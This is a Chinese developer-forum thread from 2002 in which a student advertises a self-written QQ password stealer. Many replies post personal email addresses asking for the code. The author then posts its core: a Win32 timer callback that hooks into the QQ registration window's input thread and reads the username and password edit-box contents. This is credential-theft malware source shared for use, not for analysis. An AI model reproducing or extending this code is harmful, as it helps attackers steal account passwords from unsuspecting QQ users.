盗取QQ密码的源程序

powerdog 2002-01-16 03:27:38
小弟用SDK写了个盗QQ密码的程序,还有一个俄罗斯方块,界面用SDK,算法用C++实现,需要源代码请留下EMAIL。小弟非常熟悉VC++,只敢说熟悉,不敢说精通。想在寒假在杭州找一份兼职工作,还请杭州的程序员朋友多多帮忙。
...全文
683 31 打赏 收藏 转发到动态 举报
写回复
用AI写文章
31 条回复
切换为时间正序
请发表友善的回复…
发表回复
vcshcn 2002-01-17
  • 打赏
  • 举报
回复
vcshcn@sohu.com
thanks
powerdog 2002-01-17
  • 打赏
  • 举报
回复
要的人太多了,我把部分核心代码列出来,大家漫漫研究吧,还请杭州的程序员介绍一份工作,小弟还是学生,寒假想打工。
void CALLBACK timer(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime)
{
HWND m_hwnd,hw_focus;
DWORD threadid;
m_hwnd=FindWindow(NULL,"QQ 注册向导");
if(m_hwnd==0)
return;

threadid=GetWindowThreadProcessId(m_hwnd,NULL);
AttachThreadInput(GetCurrentThreadId(),threadid,TRUE);
hw_focus=GetFocus();
if(IsEditWindow(hw_focus))
{
if(IsPasswordWindow(hw_focus))
SendMessage(hw_focus,WM_GETTEXT,20,long(mima));
else
SendMessage(hw_focus,WM_GETTEXT,20,long(yhm));
}
}
BOOLEAN IsPasswordWindow(HWND hwnd)
{


DWORD dwstyle=GetWindowLong(hwnd,GWL_STYLE);
if((dwstyle&ES_PASSWORD)==0)
return FALSE;

return TRUE;

}
BOOLEAN IsEditWindow(HWND hwnd)
{
char szClassName[60];
if(!GetClassName(hwnd,szClassName,60)||strcmp("Edit",szClassName)!=0)return FALSE;
return TRUE;
}



lovek666 2002-01-17
  • 打赏
  • 举报
回复
aspp@371.net
ltyyan 2002-01-17
  • 打赏
  • 举报
回复
ltyyan@163.net
thanks
yhou31 2002-01-17
  • 打赏
  • 举报
回复
yhou31@163.net
Thanks!
lanren 2002-01-17
  • 打赏
  • 举报
回复
mailto: mail_wle@263.net

thank you!!!!
8341 2002-01-17
  • 打赏
  • 举报
回复
niepan@sohu.com
thanks
blue_soft 2002-01-16
  • 打赏
  • 举报
回复
space0956@sina.com
wangme 2002-01-16
  • 打赏
  • 举报
回复
给我一分吧!谢谢!!
wangme@sina.com
unicode 2002-01-16
  • 打赏
  • 举报
回复
unicodes@163.com
thank you !
xyquanbo 2002-01-16
  • 打赏
  • 举报
回复
我要 xyquanbo@163.com
coolvc 2002-01-16
  • 打赏
  • 举报
回复
偶也是不是杭州的,coolvc@163.com

QQ500632
codingcoding 2002-01-16
  • 打赏
  • 举报
回复
偶也是杭州的
qxksos 2002-01-16
  • 打赏
  • 举报
回复
qxksos@263.net
谢了
lighao 2002-01-16
  • 打赏
  • 举报
回复
me me

thanks


lighao@163.net
sunsea_sun 2002-01-16
  • 打赏
  • 举报
回复
sunsea_sun@citiz.net
lemonnony 2002-01-16
  • 打赏
  • 举报
回复
lemonnony@sina.com
3X
cocowhb 2002-01-16
  • 打赏
  • 举报
回复
cocowhb@sina.com
thanks
woaiwyx 2002-01-16
  • 打赏
  • 举报
回复
abcdefg171459@163.com
thank you
gcd0318 2002-01-16
  • 打赏
  • 举报
回复
gcd0318@163.com
3q
加载更多回复(11)

594

社区成员

发帖
与我相关
我的任务
社区描述
提出问题
其他 技术论坛(原bbs)
社区管理员
  • community_281
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧